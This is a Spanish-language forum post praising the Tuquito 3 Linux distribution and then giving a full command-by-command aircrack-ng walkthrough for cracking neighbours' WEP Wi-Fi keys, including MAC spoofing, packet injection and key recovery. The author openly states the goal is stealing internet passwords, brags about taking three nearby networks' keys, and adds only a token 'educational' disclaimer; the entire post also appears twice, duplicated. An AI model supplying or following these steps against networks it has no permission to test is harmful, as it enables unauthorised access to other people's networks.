tuxwar
Bovino adicto
- Desde
- 1 Ago 2008
- Mensajes
- 679
- Tema Autor
- #1
Tuquito y Aircrack-ng, Claves wifi sin wifislax...
Hace poco instale Tuquito 3 en una computadora de un amigo solo por curiosidad, y quede sorprendido al ver la velocidad con la que estaba trabajando dicha computadora, me activo los efectos de compiz automaticamente me detecto tarjetas de red, audio todo el hardware ademas trae muchos codecs de audio y video por lo que solamente necesitas dar click sobre la cancion o video que quieras reproducir y listo, el sistema viene con gnome.
Pero sin lugar a dudas la parte que mas me sorprendio fue cuando decidi instalar Aircrack-ng para Hacerle auditoria a redes wireless, bueno seamos claros para robar claves de internet. en 15 minutos obtuve 3 claves de redes que estaban cerca de la casa de mi amigo, pruebenlo bien vale la pena, aqui les dejo el enlace de descarga y al blog tuquito.
Blog
http://blog.tuquito.org.ar/
Enlace de descarga a tuquito 3
http://blog.tuquito.org.ar/descargas/
Por cierto en mi blog tambien tengo estos enlaces y proximamente sibire el metodo que use para obtener las claves.
Bien empecemos, por peticion de los hermanos bakunos explicare el proceso por el cual e obtenido claves wep, aclarando que solo es con fines educativos propiamente espero no lo usen para hacer maldad, bien una vez obtenida una copia de tuquito 3 o cualquier distro de linux siempre y cuando no tengas problemas con tu tarjeta de red, fijense que curioso las distros que fueron exclusivamente creadas para este fin muchas veces no funcionan y hay que estar descargando una nueva version que tenga soposte para nuestra tarjeta de red.
una vez que su tarjeta de red funciona a la perfeccion proseguimos, este metodo es valido para casi cualquier distro es mas probable que funcione en las que se basan en Debian.
1. instalamos aircrack-ng con un simple comando
$ sudo apt-get install aircrack-ng
averiguamos cual es el nombre de la interface puede variar, con el comando iwconfig
en mi caso es wlan0 tambien hay que anotar nuestra macaddress por si no les funciona el macchanger
ahora detenemos la interface de red con el comando:
# airmon-ng stop wlan0
mandara un mensaje de monitor mode disabled todo esta bien, ahora bajamos interfaces con:
# ifconfig wlan0 down
este comando por lo general no arojara mensaje alguno
cambiamos nuestra macadress con:
# macchanger --mac 00:11:22:33:44:55 wlan0
en caso de no tener este comando o que no funcione es por que tu tarjeta no es compatible pero no hay ningun problema podemos continuar con el proceso, solo como pequeño dato a tomar en cuenta, solo utilicen redes que tengan proteccion wep por que son las mas faciles de desencriptar y aparte te das cuenta de que la persona que es dueña de esta red y sin ofender no sabe mucho sobre como proteger su red por el contrario si encuentras una red super protegida con otro metodo mejor ni la toques por que puede ser que esten corriendo un autoscan y te detecten o peor aun clonen tu disco duro o dañen tu equipo esa es mi recomendacion si no tienes mucha experiencia en esto de la auditoria, bueno continuamos.
activamos el modo monitor de la tarjeta.
# airmon-ng start wlan0
nos lanzara una serie de comandos y hasta el ultimo aparecera un mensaje importante que dice monitor mode enabled on mon0. De qui en adelante utilizaremos la interface mon0.
comienza lo bueno empezamos a escanear las redes con.
# airodump-ng mon0
una vez que obtenemos los datos de la red que queremos auditar presionamos ctrl+c para detener el proceso y copiamos los siguientes datos.
el canal CH 1, 11, 6, etc el que aparezca
BSSID que es la mac del modem
ESSID que es el nombre del modem o la red o el router como le quieran decir dejemoslo en nombre de la conexion
con los datos obtenidos escribimos lo siguiente
# airodump-ng -c <canalsin simbolos mayor y menor> -w testprueba --bssid <BSSID del modem> mon0
al poner los datos concretos no se ponen los simbolos mayor y menor que, testprueba es el archivo en donde se almacenaran datos prioritarios para aircrack puede llevar cualquier nombre solo recuerdelo por que se va a utilizar, abra una nueva terminal y escriba lo siguiente.
# aireplay-ng -1 0 -a <BSSID> -h <NUESTRA MAC> -e <ESSID> mon0
saldran unos mensajes pero debe salir un simbolo o carita como
si sale hasta aca vamos bien. Escriba lo siguiente
# aireplay-ng -3 -b <BSSID> -h <NUESTRA MAC> mon0
esto comenzara la inyeccion de paquetes para celerar el proceso solo basta esperar, maximizamos la primera terminal recuerde que llevamos 2 terminales abiertas abrimos la primera que es la que esta capturando los paquetes, observe la parte que dice #Data espere a que por lo menos llegue a 15000 y abrimos otra terminal esta seria la tercera, y escribimos lo siguiente y ultimo este comando revelara la clave como por arte de magia suerte.
recuerde que mientras esten transitando muchos datos por la red sera mas facil.
# aircrack-ng -n 64 -b <BSSID> testprueba<-01.cap esto es asignado automaticamente pero el archivo es un .cap>
bien al finalizar aparece un mensaje que dice
KEY FOUND! [49:23:45:66:77]
LE QUITAN LOS 2 PUNTOS Y LA CLAVE ES: 4923456677
ES TODO ¡SUERTE!
PROCESO REALIZADO EN TUQUITO3 CON CHIP ATHEROS
Hace poco instale Tuquito 3 en una computadora de un amigo solo por curiosidad, y quede sorprendido al ver la velocidad con la que estaba trabajando dicha computadora, me activo los efectos de compiz automaticamente me detecto tarjetas de red, audio todo el hardware ademas trae muchos codecs de audio y video por lo que solamente necesitas dar click sobre la cancion o video que quieras reproducir y listo, el sistema viene con gnome.
Pero sin lugar a dudas la parte que mas me sorprendio fue cuando decidi instalar Aircrack-ng para Hacerle auditoria a redes wireless, bueno seamos claros para robar claves de internet. en 15 minutos obtuve 3 claves de redes que estaban cerca de la casa de mi amigo, pruebenlo bien vale la pena, aqui les dejo el enlace de descarga y al blog tuquito.
Blog
http://blog.tuquito.org.ar/
Enlace de descarga a tuquito 3
http://blog.tuquito.org.ar/descargas/
Por cierto en mi blog tambien tengo estos enlaces y proximamente sibire el metodo que use para obtener las claves.
Bien empecemos, por peticion de los hermanos bakunos explicare el proceso por el cual e obtenido claves wep, aclarando que solo es con fines educativos propiamente espero no lo usen para hacer maldad, bien una vez obtenida una copia de tuquito 3 o cualquier distro de linux siempre y cuando no tengas problemas con tu tarjeta de red, fijense que curioso las distros que fueron exclusivamente creadas para este fin muchas veces no funcionan y hay que estar descargando una nueva version que tenga soposte para nuestra tarjeta de red.
una vez que su tarjeta de red funciona a la perfeccion proseguimos, este metodo es valido para casi cualquier distro es mas probable que funcione en las que se basan en Debian.
1. instalamos aircrack-ng con un simple comando
$ sudo apt-get install aircrack-ng
averiguamos cual es el nombre de la interface puede variar, con el comando iwconfig
en mi caso es wlan0 tambien hay que anotar nuestra macaddress por si no les funciona el macchanger
ahora detenemos la interface de red con el comando:
# airmon-ng stop wlan0
mandara un mensaje de monitor mode disabled todo esta bien, ahora bajamos interfaces con:
# ifconfig wlan0 down
este comando por lo general no arojara mensaje alguno
cambiamos nuestra macadress con:
# macchanger --mac 00:11:22:33:44:55 wlan0
en caso de no tener este comando o que no funcione es por que tu tarjeta no es compatible pero no hay ningun problema podemos continuar con el proceso, solo como pequeño dato a tomar en cuenta, solo utilicen redes que tengan proteccion wep por que son las mas faciles de desencriptar y aparte te das cuenta de que la persona que es dueña de esta red y sin ofender no sabe mucho sobre como proteger su red por el contrario si encuentras una red super protegida con otro metodo mejor ni la toques por que puede ser que esten corriendo un autoscan y te detecten o peor aun clonen tu disco duro o dañen tu equipo esa es mi recomendacion si no tienes mucha experiencia en esto de la auditoria, bueno continuamos.
activamos el modo monitor de la tarjeta.
# airmon-ng start wlan0
nos lanzara una serie de comandos y hasta el ultimo aparecera un mensaje importante que dice monitor mode enabled on mon0. De qui en adelante utilizaremos la interface mon0.
comienza lo bueno empezamos a escanear las redes con.
# airodump-ng mon0
una vez que obtenemos los datos de la red que queremos auditar presionamos ctrl+c para detener el proceso y copiamos los siguientes datos.
el canal CH 1, 11, 6, etc el que aparezca
BSSID que es la mac del modem
ESSID que es el nombre del modem o la red o el router como le quieran decir dejemoslo en nombre de la conexion
con los datos obtenidos escribimos lo siguiente
# airodump-ng -c <canalsin simbolos mayor y menor> -w testprueba --bssid <BSSID del modem> mon0
al poner los datos concretos no se ponen los simbolos mayor y menor que, testprueba es el archivo en donde se almacenaran datos prioritarios para aircrack puede llevar cualquier nombre solo recuerdelo por que se va a utilizar, abra una nueva terminal y escriba lo siguiente.
# aireplay-ng -1 0 -a <BSSID> -h <NUESTRA MAC> -e <ESSID> mon0
saldran unos mensajes pero debe salir un simbolo o carita como

# aireplay-ng -3 -b <BSSID> -h <NUESTRA MAC> mon0
esto comenzara la inyeccion de paquetes para celerar el proceso solo basta esperar, maximizamos la primera terminal recuerde que llevamos 2 terminales abiertas abrimos la primera que es la que esta capturando los paquetes, observe la parte que dice #Data espere a que por lo menos llegue a 15000 y abrimos otra terminal esta seria la tercera, y escribimos lo siguiente y ultimo este comando revelara la clave como por arte de magia suerte.
recuerde que mientras esten transitando muchos datos por la red sera mas facil.
# aircrack-ng -n 64 -b <BSSID> testprueba<-01.cap esto es asignado automaticamente pero el archivo es un .cap>
bien al finalizar aparece un mensaje que dice
KEY FOUND! [49:23:45:66:77]
LE QUITAN LOS 2 PUNTOS Y LA CLAVE ES: 4923456677
ES TODO ¡SUERTE!
PROCESO REALIZADO EN TUQUITO3 CON CHIP ATHEROS